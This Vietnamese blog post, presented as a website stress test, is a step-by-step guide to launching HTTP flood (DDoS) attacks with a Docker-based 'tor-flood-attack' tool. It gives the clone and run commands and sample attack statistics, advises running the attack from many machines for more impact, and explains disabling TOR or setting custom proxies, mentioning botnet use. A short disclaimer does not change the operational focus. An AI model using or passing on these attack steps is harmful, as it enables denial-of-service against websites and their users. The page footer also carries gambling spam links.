• Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Cách Stress Test Website bằng cách tấn công HTTP Flood

Ellyx13 by Ellyx13
18/07/2022
in Basic Hacking
Reading Time: 5 mins read
A A
2

Mục lục bài viết

  1. Thực hiện tấn công HTTP Flood
  2. Tại sao cách tấn công HTTP flood không hiệu quả?

HTTP flood là một nhánh con của các cuộc tấn công DDoS nói chung, với một điểm khác biệt chính là khi thực hiện HTTP flood, kẻ tấn công thực hiện các yêu cầu HTTP GET/POST/PUT “hợp pháp” để đặt thêm tải lên máy chủ web/ứng dụng.

Tuyên bố từ chối trách nhiệm: Bài viết này chỉ dành cho mục đích giáo dục. Bạn phải tự chịu rủi ro nếu làm theo hướng dẫn. Không tấn công trang web mà bạn không sở hữu hoặc bạn không có quyền stress test.

Các bài viết liên quan

AnonyDOS

AnonyDOS – Công cụ DOS mạng WiFi

04/07/2022
DDosify - Công cụ kiểm tra sức chịu tải DDoS của Website 3

DDosify – Công cụ kiểm tra sức chịu tải DDoS của Website

01/07/2022
HASOKI - Công cụ DDoS Website Bypass CloudFlare 4

HASOKI – Công cụ DDoS Website Bypass CloudFlare

30/05/2022 - Updated on 31/05/2022
Giao diện Raven Storm

Raven Storm – DDos Toolkit bằng Python

01/04/2022

Cách stress test web bằng cách tấn công HTTP Flood

Cách tiếp cận này đặc biệt hiệu quả nếu bạn có thể tìm ra những yêu cầu nào gây tốn kém cho máy chủ. Truy xuất/tính toán một số dữ liệu và gây căng thẳng cho cơ sở dữ liệu/phần cứng máy chủ hoặc tải xuống các tệp lớn hơn buộc lưu lượng phải bổ sung qua mạng. Yêu cầu HTTP càng nhiều thì càng tốt.

Các cuộc tấn công HTTP flood có thể khiến ứng dụng được nhắm mục tiêu không phản hồi, hoặc thậm chí làm sập hoàn toàn ứng dụng. Và hôm nay chúng ta sẽ tìm hiểu thêm về cách tấn công HTTP flood.

Thực hiện tấn công HTTP Flood

Mình có tìm được một công cụ thực hiện các cuộc tấn công HTTP flood và mình sẽ hướng dẫn các bạn cách sử dụng nó một cách ngắn gọn. Bạn có thể xem công cụ đó tại đây. Nếu bạn muốn làm theo hướng dẫn này thì hãy chuẩn bị PC/máy chủ của bạn bằng cách cài đặt Docker và chạy lệnh docker -omp

Bước này khá dễ nên mình sẽ bỏ qua, sau khi Docker đã sẵn sàng, bạn chỉ cần sao chép kho lưu trữ, điều hướng đến thư mục gốc của dự án và chạy lệnh docker-compos:

git clone https://github.com/JPLeoRX/tor-flood-attack.git
cd tor-flood-attack
docker-compose up --build -d && docker-compose logs -f -t

Bạn sẽ thấy nhật ký build và sau đó các container sẽ được tạo:

...
Successfully built 7d3537fa2051
Successfully tagged tor-flood-attack_app:latest
Creating tor-flood-attack_app_1  ... done
Creating tor-flood-attack_app_2  ... done
Creating tor-flood-attack_app_3  ... done
Creating tor-flood-attack_app_4  ... done
Creating tor-flood-attack_app_5  ... done
Creating tor-flood-attack_app_6  ... done
Creating tor-flood-attack_app_7  ... done
Creating tor-flood-attack_app_8  ... done
Creating tor-flood-attack_app_9  ... done
Creating tor-flood-attack_app_10 ... done
Creating tor-flood-attack_app_11 ... done
Creating tor-flood-attack_app_12 ... done
...

Dành thêm vài phút để công cụ khởi chạy TOR và Privoxy, và nếu thành công, bạn sẽ thấy đầu ra tương tự như này, hiển thị cho bạn số liệu thống kê của từng yêu cầu tấn công:

...
app_1  | 2022-02-27T14:50:39.803225587Z debug_stats(): ----------------------- 
app_1  | 2022-02-27T14:50:39.803292708Z debug_stats(): https://XXXXXX.com
app_1  | 2022-02-27T14:50:39.804966586Z debug_stats(): Total responses count: 390
app_1  | 2022-02-27T14:50:39.805010847Z debug_stats(): Success responses: 390
app_1  | 2022-02-27T14:50:39.805024164Z debug_stats(): Execution time is 1.06 s, speed is 369.1 r/s
...

Giờ bạn chỉ cần xem trang web mục tiêu phản hồi chậm như thế nào. Chỉ cần đảm bảo chọn một mục tiêu.

Như với bất kỳ cuộc tấn công DDoS nào – từ khóa ở đây là “phân tán”, HTTP flood sẽ cực kỳ hiệu quả khi được khởi chạy từ một số máy chủ/PC cùng một lúc. Bạn càng có nhiều phiên đang chạy thì bạn càng có thể gây căng thẳng cho trang web mục tiêu.

Ngoài ra, bạn cũng có thể thử các cài đặt hiệu suất như được mô tả trong README.md, bạn có thể gửi nhiều yêu cầu hơn mỗi giây từ kết nối của mình.

Tại sao cách tấn công HTTP flood không hiệu quả?

Vấn đề lớn nhất là TOR proxy (mặc dù rất tốt trong việc ẩn địa chỉ IP của máy bạn) có những nhược điểm riêng. Trước hết, nó chậm, các yêu cầu được thực hiện thông qua TOR chậm hơn rất nhiều. Sau đó, chúng ta gặp sự cố ngắt kết nối liên tục, proxy TOR có thể ngắt kết nối, từ chối kết nối,… Nhìn chung, điều này khá phiền và trong trường hợp xấu nhất, khoảng 1/3 yêu cầu của bạn có thể bị mất do những vấn đề này.

Thực sự rất dễ để bất kỳ máy chủ web nào chặn tất cả lưu lượng truy cập đến từ TOR. Vậy nên nếu bạn vẫn muốn thực hiện cuộc tấn công và không ngại để lộ IP của mình (ví dụ: nếu bạn chạy một mạng botnet) thì bạn có thể làm như vậy. Chỉ cần thay đổi biến ENABLE_TOR thành 0 trong docker-compos.yml:

...
ENABLE_TOR: 0
...

Hơn nữa, nếu bạn biết mình đang làm gì, bạn có thể đặt proxy HTTP của riêng mình trong main_aiohttp.py bằng cách ghi đè biến proxy trong hàm epoch:

...
async def epoch(epoch_number: int):
    ...
    # For each target
    for i in range(0, len(LIST_OF_URLS)):
        ...
        proxy = None
        if ENABLE_TOR:
            proxy = "http://127.0.0.1:8118"
        else:
            print('epoch(): WARNING!!!! TOR is disabled!!!!')
        ...
    ...
...

Chỉ cần lưu ý rằng việc chặn địa chỉ IP của máy tính hoặc VPN của bạn cũng khá dễ dàng.

Tuy nhiên, mặc dù có những nhược điểm trên, nhưng HTTP flood có thể có hiệu quả trên các ứng dụng web không có bất kỳ biện pháp phòng chống DDoS tự động nào.

Tags: DDOSHTTP Floodstress testĐos
Previous Post

Danh sách các Room Free trên Tryhackme để tập Hack

Next Post

Cách tự động kích hoạt File Python khi cắm USB

Ellyx13

Ellyx13

Có người không dám bước vì sợ gãy chân, nhưng sợ gãy chân mà không dám bước đi thì khác nào chân đã gãy.

Related Posts

Một chút Writeup về Skynet 5
Basic Hacking

Một chút Writeup về Skynet

12/08/2022
Cách cài đặt FlareVM trên VirtualBox 6
Basic Hacking

Cách cài đặt FlareVM trên VirtualBox

09/08/2022
SMS bomber
Basic Hacking

Hướng dẫn sử dụng tool spam SMS OTP V3

08/08/2022
Cách Quét lỗ hổng bảo mật bằng Metasploit 7
Basic Hacking

Cách Quét lỗ hổng bảo mật bằng Metasploit

03/08/2022
Hướng dẫn khai thác lỗi SQL Injection cơ bản 8
Basic Hacking

Hướng dẫn khai thác lỗi SQL Injection cơ bản

29/07/2022
Cách cấu hình Ngrok để NAT Port trên Kali Linux 9
Basic Hacking

Cách cấu hình Ngrok để NAT Port trên Kali Linux

26/07/2022
Next Post
Cách tự động kích hoạt File Python khi cắm USB 10

Cách tự động kích hoạt File Python khi cắm USB

guest

guest

Website này sử dụng Akismet để hạn chế spam. Tìm hiểu bình luận của bạn được duyệt như thế nào.

2 Comments
oldest
newest
Inline Feedbacks
View all comments
Ẩn Danh VIP
Ẩn Danh VIP
28 days ago

Mình theo dõi web khá lâu rồi.
ad có thể làm 1 bài hướng dẫn chi tiết nhất về việc chống ddos.
cài rate limit vô Nginx hoặc cài limit bằng iptables cho vps không ạ.

Reply
AnonyViet
Admin
AnonyViet
28 days ago
Reply to  Ẩn Danh VIP

bạn search seri antiddos của vietnix nhé, có đủ luôn

Reply
wpdiscuz   wpDiscuz

Liên hệ Quảng Cáo

Lien he AnonyViet

Đối tác —

Fshare

Các bài mới

Deepfake: Mối đe dọa an ninh đằng sau khuôn mặt nhân tạo 11

Deepfake: Mối đe dọa an ninh đằng sau khuôn mặt nhân tạo

19/08/2022
10 ứng dụng mà mọi sinh viên đại học nên cài đặt 12

10 ứng dụng mà mọi sinh viên đại học nên cài đặt

19/08/2022
có nền dùng windows defender

Có cần cài phần mềm diệt Virus khác khi đã có Windows Defender không?

18/08/2022
14 phần mềm Quản lý File tốt hơn File Explorer 13

14 phần mềm Quản lý File tốt hơn File Explorer

17/08/2022
Hướng dẫn tùy chỉnh Windows Terminal 14

Hướng dẫn tùy chỉnh Windows Terminal

16/08/2022

Ads

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

Bản quyền: DMCA.com Protection Status

Phản hồi gần đây

  • Phú trong Cách nhận 160.000đ để mua Hosting/VPS của TotHost [Độc quyền AnonyViet]
  • QThang trong Cách nhận 160.000đ để mua Hosting/VPS của TotHost [Độc quyền AnonyViet]
  • Zero trong Hướng dẫn viết Tool DDoS đơn giản bằng Python
  • Hà Hữu Tùng trong Cách nhận 160.000đ để mua Hosting/VPS của TotHost [Độc quyền AnonyViet]
  • Ann trong Cách nhận 160.000đ để mua Hosting/VPS của TotHost [Độc quyền AnonyViet]

©2022 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. Google iwin888 Bing tải game iwin Github tải iwin apk Github tải win456 Youtube ku fun wikipedia 88vin reddit twin 92lottery tải tdtc stackoverflow tool tài xỉu 68 club 68 game bài iwinclub.link mua nick facebook

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2022 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. Google iwin888 Bing tải game iwin Github tải iwin apk Github tải win456 Youtube ku fun wikipedia 88vin reddit twin 92lottery tải tdtc stackoverflow tool tài xỉu 68 club 68 game bài iwinclub.link mua nick facebook

wpDiscuz
pixel